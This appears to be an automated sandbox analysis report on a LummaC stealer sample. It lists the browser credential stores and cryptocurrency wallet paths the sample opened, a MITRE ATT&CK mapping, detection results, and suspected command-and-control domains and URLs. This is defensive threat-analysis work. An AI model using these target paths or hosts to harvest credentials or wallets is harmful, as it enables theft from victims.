                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: Yara matchFile source: 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ji2xlo1f.exe PID: 4176, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: ji2xlo1f.exe PID: 4176, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Virtualization/Sandbox Evasion                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services31
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information                		LSASS Memory11
                Virtualization/Sandbox Evasion                		Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS1
                File and Directory Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets122
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ji2xlo1f.exe50%ReversingLabsWin32.Trojan.Lumma
                ji2xlo1f.exe100%AviraHEUR/AGEN.1313948
                ji2xlo1f.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/apijson0%Avira URL Cloudsafe
                https://lev-tolstoi.com/Akys0%Avira URL Cloudsafe
                https://lev-tolstoi.com/n#0%Avira URL Cloudsafe
                https://lev-tolstoi.com:443/apical0%Avira URL Cloudsafe
                https://lev-tolstoi.com/r0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apiic0%Avira URL Cloudsafe
                https://lev-tolstoi.com/qWU0rNf#0%Avira URL Cloudsafe
                https://lev-tolstoi.com/e0%Avira URL Cloudsafe
                https://lev-tolstoi.com/a0%Avira URL Cloudsafe
                https://lev-tolstoi.com/v#0%Avira URL Cloudsafe
                https://lev-tolstoi.com/rsF#0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apiN#0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apix0%Avira URL Cloudsafe
                https://lev-tolstoi.com:443/api20%Avira URL Cloudsafe
                https://lev-tolstoi.com/apim0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.210.172
                		truefalse
                  		high
                  steamcommunity.com
                  		23.55.153.106
                  		truefalse
                    		high
                    lev-tolstoi.com
                    		104.21.66.86
                    		truefalse
                      		high
                      fp2e7a.wpc.phicdn.net
                      		192.229.221.95
                      		truefalse
                        		high
                        nightybinybz.shop
                        		unknown
                        		unknowntrue
                          		unknown
                          moutheventushz.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            standartedby.shop
                            		unknown
                            		unknowntrue
                              		unknown
                              terracedjz.cyou
                              		unknown
                              		unknownfalse
                                		high
                                respectabosiz.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  conceszustyb.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    bakedstusteeb.shop
                                    		unknown
                                    		unknownfalse
                                      		high
                                      mutterissuen.shop
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        worddosofrm.shop
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          nightybinybz.shopfalse
                                            		high
                                            moutheventushz.shopfalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                standartedby.shopfalse
                                                  		high
                                                  https://lev-tolstoi.com/apifalse
                                                    		high
                                                    bakedstusteeb.shopfalse
                                                      		high
                                                      respectabosiz.shopfalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/chrome_newtabji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://player.vimeo.comji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/?subsection=broadcastsji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://lev-tolstoi.com/apiicji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://lev-tolstoi.com/rji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483290597.00000000016F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://store.steampowered.com/subscriber_agreement/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.gstatic.cn/recaptcha/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://lev-tolstoi.com/apijsonji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://lev-tolstoi.com:443/apicalji2xlo1f.exe, 00000001.00000003.2571494048.00000000016E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.valvesoftware.com/legal.htmji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.comji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.comji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://s.ytimg.com;ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxxji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://lev-tolstoi.com/eji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steam.tv/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://lev-tolstoi.com/aji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://lev-tolstoi.com/v#ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://lev-tolstoi.com/ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2491194547.0000000003D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://store.steampowered.com/privacy_agreement/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://store.steampowered.com/points/shop/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://lev-tolstoi.com/qWU0rNf#ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://lev-tolstoi.com/Akysji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://sketchfab.comji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.ecosia.org/newtab/ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://lv.queniujq.cnji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.youtube.com/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://store.steampowered.com/privacy_agreement/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
